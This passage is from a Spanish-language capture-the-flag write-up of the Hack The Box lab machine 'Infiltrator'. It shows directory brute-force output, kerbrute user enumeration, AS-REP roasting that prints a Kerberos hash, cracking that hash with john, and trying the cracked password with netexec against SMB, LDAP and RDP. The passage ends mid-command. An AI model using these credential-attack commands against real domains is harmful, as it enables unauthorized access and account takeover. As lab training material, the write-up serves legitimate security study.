http://infiltrator.htb/assets/images/member-item-05.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 617l 1638w 31235c http://infiltrator.htb/index.html </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 135l 669w 57825c http://infiltrator.htb/assets/images/project-item-06.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 2337l 3940w 39751c http://infiltrator.htb/assets/css/font-awesome.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 124l 641w 57511c http://infiltrator.htb/assets/images/project-item-04.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 171l 746w 55697c http://infiltrator.htb/assets/images/member-item-02.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 12l 558w 35324c http://infiltrator.htb/assets/js/isotope.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 172l 1148w 72183c http://infiltrator.htb/assets/images/slide-01.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1672l 3560w 34773c http://infiltrator.htb/assets/css/templatemo-breezed.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 2445l 10688w 83672c http://infiltrator.htb/assets/js/popper.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 243l 1328w 73286c http://infiltrator.htb/assets/images/slide-02.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 204l 1115w 86505c http://infiltrator.htb/assets/images/project-big-item-05.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 662w 58078c http://infiltrator.htb/assets/js/bootstrap.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 306l 1656w 136332c http://infiltrator.htb/assets/images/project-big-item-02.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 278l 1583w 114385c http://infiltrator.htb/assets/images/project-big-item-01.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 4l 1304w 83617c http://infiltrator.htb/assets/js/jquery-2.1.0.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 2892l 6607w 87155c http://infiltrator.htb/assets/js/slick.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 3448l 10094w 93440c http://infiltrator.htb/assets/js/owl-carousel.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 1966w 155764c http://infiltrator.htb/assets/css/bootstrap.min.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 609l 3241w 266155c http://infiltrator.htb/assets/images/project-big-item-03.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 422l 2618w 230919c http://infiltrator.htb/assets/images/project-big-item-04.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 437l 2587w 224090c http://infiltrator.htb/assets/images/project-big-item-06.jpg </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 153c http://infiltrator.htb/assets <span class="o">=</span>&gt; http://infiltrator.htb/assets/ </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 29l 92w 1233c http://infiltrator.htb/assets/css/ </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 29l 92w 1233c http://infiltrator.htb/assets/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 160c http://infiltrator.htb/assets/images <span class="o">=</span>&gt; http://infiltrator.htb/assets/images/ </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 29l 92w 1233c http://infiltrator.htb/assets/images/ </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 29l 92w 1233c http://infiltrator.htb/assets/js/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 160c http://infiltrator.htb/assets/Images <span class="o">=</span>&gt; http://infiltrator.htb/assets/Images/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 6259l 31957w 2686127c http://infiltrator.htb/assets/images/member-item-06.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 617l 1638w 31235c http://infiltrator.htb/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 157c http://infiltrator.htb/assets/css <span class="o">=</span>&gt; http://infiltrator.htb/assets/css/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 156c http://infiltrator.htb/assets/js <span class="o">=</span>&gt; http://infiltrator.htb/assets/js/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 159c http://infiltrator.htb/assets/fonts <span class="o">=</span>&gt; http://infiltrator.htb/assets/fonts/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 160c http://infiltrator.htb/assets/IMAGES <span class="o">=</span>&gt; http://infiltrator.htb/assets/IMAGES/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 153c http://infiltrator.htb/Assets <span class="o">=</span>&gt; http://infiltrator.htb/Assets/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 160c http://infiltrator.htb/Assets/images <span class="o">=</span>&gt; http://infiltrator.htb/Assets/images/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 160c http://infiltrator.htb/Assets/Images <span class="o">=</span>&gt; http://infiltrator.htb/Assets/Images/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 157c http://infiltrator.htb/Assets/css <span class="o">=</span>&gt; http://infiltrator.htb/Assets/css/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 159c http://infiltrator.htb/assets/Fonts <span class="o">=</span>&gt; http://infiltrator.htb/assets/Fonts/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 156c http://infiltrator.htb/Assets/js <span class="o">=</span>&gt; http://infiltrator.htb/Assets/js/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 159c http://infiltrator.htb/Assets/fonts <span class="o">=</span>&gt; http://infiltrator.htb/Assets/fonts/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 160c http://infiltrator.htb/Assets/IMAGES <span class="o">=</span>&gt; http://infiltrator.htb/Assets/IMAGES/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 157c http://infiltrator.htb/assets/CSS <span class="o">=</span>&gt; http://infiltrator.htb/assets/CSS/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 156c http://infiltrator.htb/assets/JS <span class="o">=</span>&gt; http://infiltrator.htb/assets/JS/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 159c http://infiltrator.htb/Assets/Fonts <span class="o">=</span>&gt; http://infiltrator.htb/Assets/Fonts/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 157c http://infiltrator.htb/Assets/CSS <span class="o">=</span>&gt; http://infiltrator.htb/Assets/CSS/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 156c http://infiltrator.htb/Assets/JS <span class="o">=</span>&gt; http://infiltrator.htb/Assets/JS/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/images/102953 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/images/Nabila </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/fonts/129762 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/css/98744 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/fonts/143292 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/IMAGES/27205 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/Images/121431 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/71372 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/JS/103329 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/JS/103330 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/Fonts/10298114 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/images/96869 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/58609 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/JS/imagesb </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/images/129396 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/123343 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/images/Nadesico%20TV%20and%20Movie </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/Images/103159 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/CSS/statistiques </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/84813 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/images/29779 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/Images/cjkvinfo </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/images/103070 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/JS/icon_time </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/102504 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/assets/JS/dl4482 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/css/t4371 </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 1245c http://infiltrator.htb/Assets/Images/t4208 </span></span></code></pre></td></tr></table> </div> </div><h2 id="kerbrute---userenum">Kerbrute - Userenum</h2> <p>Creamos un archivo con los nombres y apellidos del equipo, ejecutamos <a href="https://github.com/sckull/ctf-stuff/blob/master/scripts/usernames.py">usernames.py</a> sobre este para generar un nuevo wordlist de usuarios.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ cat usersweb.txt </span></span><span class="line"><span class="cl">DAVID ANDERSON </span></span><span class="line"><span class="cl">OLIVIA MARTINEZ </span></span><span class="line"><span class="cl">KEVIN TURNER </span></span><span class="line"><span class="cl">AMANDA WALKER </span></span><span class="line"><span class="cl">MARCUS HARRIS </span></span><span class="line"><span class="cl">LAUREN CLARK </span></span><span class="line"><span class="cl">ETHAN RODRIGUEZ </span></span><span class="line"><span class="cl">❯ wc -l usersweb.txt </span></span><span class="line"><span class="cl"><span class="m">8</span> usersweb.txt </span></span><span class="line"><span class="cl">❯ </span></span><span class="line"><span class="cl">❯ ../tools/usernames.py usersweb.txt &gt; users.txt </span></span><span class="line"><span class="cl">❯ wc -l users.txt </span></span><span class="line"><span class="cl"><span class="m">70</span> users.txt </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Ejecutamos <a href="https://github.com/ropnop/kerbrute">kerbrute</a> especificando la enumeracion de usuarios. Encontramos siete usuarios validos. Creamos un nuevo wordlist con estos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ../tools/kerbrute userenum --dc dc01.infiltrator.htb -d infiltrator.htb users.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> __ __ __ </span></span><span class="line"><span class="cl"> / /_____ _____/ /_ _______ __/ /____ </span></span><span class="line"><span class="cl"> / //_/ _ <span class="se">\/</span> ___/ __ <span class="se">\/</span> ___/ / / / __/ _ <span class="se">\ </span></span></span><span class="line"><span class="cl"> / ,&lt; / __/ / / /_/ / / / /_/ / /_/ __/ </span></span><span class="line"><span class="cl">/_/<span class="p">|</span>_<span class="p">|</span><span class="se">\_</span>__/_/ /_.___/_/ <span class="se">\_</span>_,_/<span class="se">\_</span>_/<span class="se">\_</span>__/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Version: v1.0.3 <span class="o">(</span>9dad6e1<span class="o">)</span> - 05/21/25 - Ronnie Flathers @ropnop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/05/21 02:19:52 &gt; Using KDC<span class="o">(</span>s<span class="o">)</span>: </span></span><span class="line"><span class="cl">2025/05/21 02:19:52 &gt; dc01.infiltrator.htb:88 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/05/21 02:19:52 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: d.anderson@infiltrator.htb </span></span><span class="line"><span class="cl">2025/05/21 02:19:52 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: o.martinez@infiltrator.htb </span></span><span class="line"><span class="cl">2025/05/21 02:19:52 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: k.turner@infiltrator.htb </span></span><span class="line"><span class="cl">2025/05/21 02:19:52 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: a.walker@infiltrator.htb </span></span><span class="line"><span class="cl">2025/05/21 02:19:53 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: m.harris@infiltrator.htb </span></span><span class="line"><span class="cl">2025/05/21 02:19:53 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: e.rodriguez@infiltrator.htb </span></span><span class="line"><span class="cl">2025/05/21 02:19:53 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: l.clark@infiltrator.htb </span></span><span class="line"><span class="cl">2025/05/21 02:19:53 &gt; Done! Tested <span class="m">70</span> usernames <span class="o">(</span><span class="m">7</span> valid<span class="o">)</span> in 1.932 seconds </span></span><span class="line"><span class="cl">❯ ../tools/kerbrute userenum --dc dc01.infiltrator.htb -d infiltrator.htb users.txt <span class="p">|</span> grep VALID <span class="p">|</span> cut -d <span class="s1">&#39;:&#39;</span> -f4 <span class="p">|</span> cut -d <span class="s1">&#39;@&#39;</span> -f1 <span class="p">|</span> tr -d <span class="s1">&#39;\t&#39;</span> &gt; valid_users.txt </span></span><span class="line"><span class="cl">❯ wc -l valid_users.txt </span></span><span class="line"><span class="cl"><span class="m">7</span> valid_users.txt </span></span><span class="line"><span class="cl">❯ cat valid_users.txt </span></span><span class="line"><span class="cl">d.anderson </span></span><span class="line"><span class="cl">o.martinez </span></span><span class="line"><span class="cl">k.turner </span></span><span class="line"><span class="cl">a.walker </span></span><span class="line"><span class="cl">m.harris </span></span><span class="line"><span class="cl">e.rodriguez </span></span><span class="line"><span class="cl">l.clark </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---lclark">User - l.clark</h1> <h2 id="as-rep-roasting">AS-REP Roasting</h2> <p>Ejecutamos <code>GetNPUsers</code> especificando el wordlist de nombres de usuarios validos, se muestra el hash de <code>l.clark</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ sudo ntpdate 10.10.11.31 </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> kali: </span></span><span class="line"><span class="cl">2025-05-20 19:58:58.198331 <span class="o">(</span>-0400<span class="o">)</span> -23317.293199 +/- 0.121479 10.10.11.31 s1 no-leap </span></span><span class="line"><span class="cl">CLOCK: <span class="nb">time</span> stepped by -23317.293199 </span></span><span class="line"><span class="cl">❯ impacket-GetNPUsers -no-pass -usersfile valid_users.txt -outputfile files/hashes.txt infiltrator.htb/ 2&gt;/dev/null </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> User d.anderson doesn<span class="s1">&#39;t have UF_DONT_REQUIRE_PREAUTH set </span></span></span><span class="line"><span class="cl"><span class="s1">[-] User o.martinez doesn&#39;</span>t have UF_DONT_REQUIRE_PREAUTH <span class="nb">set</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> User k.turner doesn<span class="s1">&#39;t have UF_DONT_REQUIRE_PREAUTH set </span></span></span><span class="line"><span class="cl"><span class="s1">[-] User a.walker doesn&#39;</span>t have UF_DONT_REQUIRE_PREAUTH <span class="nb">set</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> User m.harris doesn<span class="s1">&#39;t have UF_DONT_REQUIRE_PREAUTH set </span></span></span><span class="line"><span class="cl"><span class="s1">[-] User e.rodriguez doesn&#39;</span>t have UF_DONT_REQUIRE_PREAUTH <span class="nb">set</span> </span></span><span class="line"><span class="cl"><span class="nv">$krb5asrep$23$l</span>.clark@INFILTRATOR.HTB:64a110ab8cfc4db2161991f6c200245d<span class="nv">$f2fad0f2055354064bd4a185800c33f5cbc3146134f84a0613eba0a78b73bc42edd2173905d682bb847cbf93d55d7d4e5100f7ceb4ca287d3bcdfe51abba3f29879e8bcb03bee0cc3edf716ecdca0156aaf02ad9e38664d8770bec7d6f236f0f6741b1a69d3e697190fad0bfd8d50c3a25869618509efec44f4031f5107efffdc92ca0dc5a171ab5c8ca8eae3bbe8ce64a6979a74feab6e477c632d6eed274d42a930684a9ddb9d581ffce8b9b2a67af8ef6d3477e315439e036a6429e56105c4d7fa27a1a21ef03ed45ce19c9da2649b6bde968a7cf25f2c86f771c5d3b927aac37bef4646f730af64442118bbe15da0e91</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="cracking-the-hash">Cracking the Hash</h2> <p>Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash, se muestra la contrasena en texto plano.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ john files/hashes.txt --wordlist<span class="o">=</span><span class="nv">$ROCK</span> </span></span><span class="line"><span class="cl">Using default input encoding: UTF-8 </span></span><span class="line"><span class="cl">Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>krb5asrep, Kerberos <span class="m">5</span> AS-REP etype 17/18/23 <span class="o">[</span>MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x<span class="o">])</span> </span></span><span class="line"><span class="cl">Will run <span class="m">4</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl">WAT?watismypass! <span class="o">(</span><span class="nv">$krb5asrep$23$l</span>.clark@INFILTRATOR.HTB<span class="o">)</span> </span></span><span class="line"><span class="cl">1g 0:00:00:06 DONE <span class="o">(</span>2025-05-20 20:02<span class="o">)</span> 0.1438g/s 1511Kp/s 1511Kc/s 1511KC/s WEQ6897..WASHIDA </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl">Session completed. </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="services-access">Services Access</h2> <p>Las credenciales tienen acceso a los servicios smb, ldap y rdp.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u l.clark -p <span class="s1">&#39;WAT?watismypass!&#39;</span> --shares </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>.clark:WAT?watismypass! </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 NETLOGON READ Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 SYSVOL READ Logon server share </span></span><span class="line"><span class="cl">❯ netexec ldap 10.10.11.31 -u l.clark -p <span class="s1">&#39;WAT?watismypass!&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>.clark:WAT?watismypass! </span></span><span class="line"><span class="cl">❯ netexec rdp 10.10.11.31 -u l.clark -p <span class="s1">&#39;WAT?watismypass!&#39;</span> </span></span><span class="line"><span class="cl">RDP 10.10.11.31 <span class="m">3389</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> or Windows Server <span class="m">2016</span> Build <span class="m">17763</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>nla:True<span class="o">)</span> </span></span><span class="line"><span class="cl">RDP 10.10.11.31 <span class="m">3389</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>.clark:WAT?watismypass! </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Encontramos en la descripcion de K.turner lo que parece ser una contrasena, sin embargo no permite el acceso a ningun servicio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u l.clark -p <span class="s1">&#39;WAT?watismypass!&#39;</span> --users </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>.clark:WAT?watismypass! </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 -Username- -Last PW Set- -BadPW- -Description- </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 Administrator 2024-08-21 19:58:28 <span class="m">0</span> Built-in account <span class="k">for</span> administering the computer/domain </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 Guest &lt;never&gt; <span class="m">0</span> Built-in account <span class="k">for</span> guest access to the computer/domain </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 krbtgt 2023-12-04 17:36:16 <span class="m">0</span> Key Distribution Center Service Account </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 D.anderson 2023-12-04 18:56:02 <span class="m">0</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 L.clark 2023-12-04 19:04:24 <span class="m">0</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 M.harris 2025-05-28 00:31:43 <span class="m">0</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 O.martinez 2024-02-25 15:41:03 <span class="m">0</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 A.walker 2023-12-05 22:06:28 <span class="m">0</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 K.turner 2024-02-25 15:40:35 <span class="m">0</span> MessengerApp@Pass! </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 E.rodriguez 2025-05-28 00:31:43 <span class="m">0</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 winrm_svc 2024-08-02 22:42:45 <span class="m">0</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 lan_managment 2024-08-02 22:42:46 <span class="m">0</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Enumerated <span class="m">12</span> <span class="nb">local</span> users: INFILTRATOR </span></span><span class="line"><span class="cl">❯ netexec smb 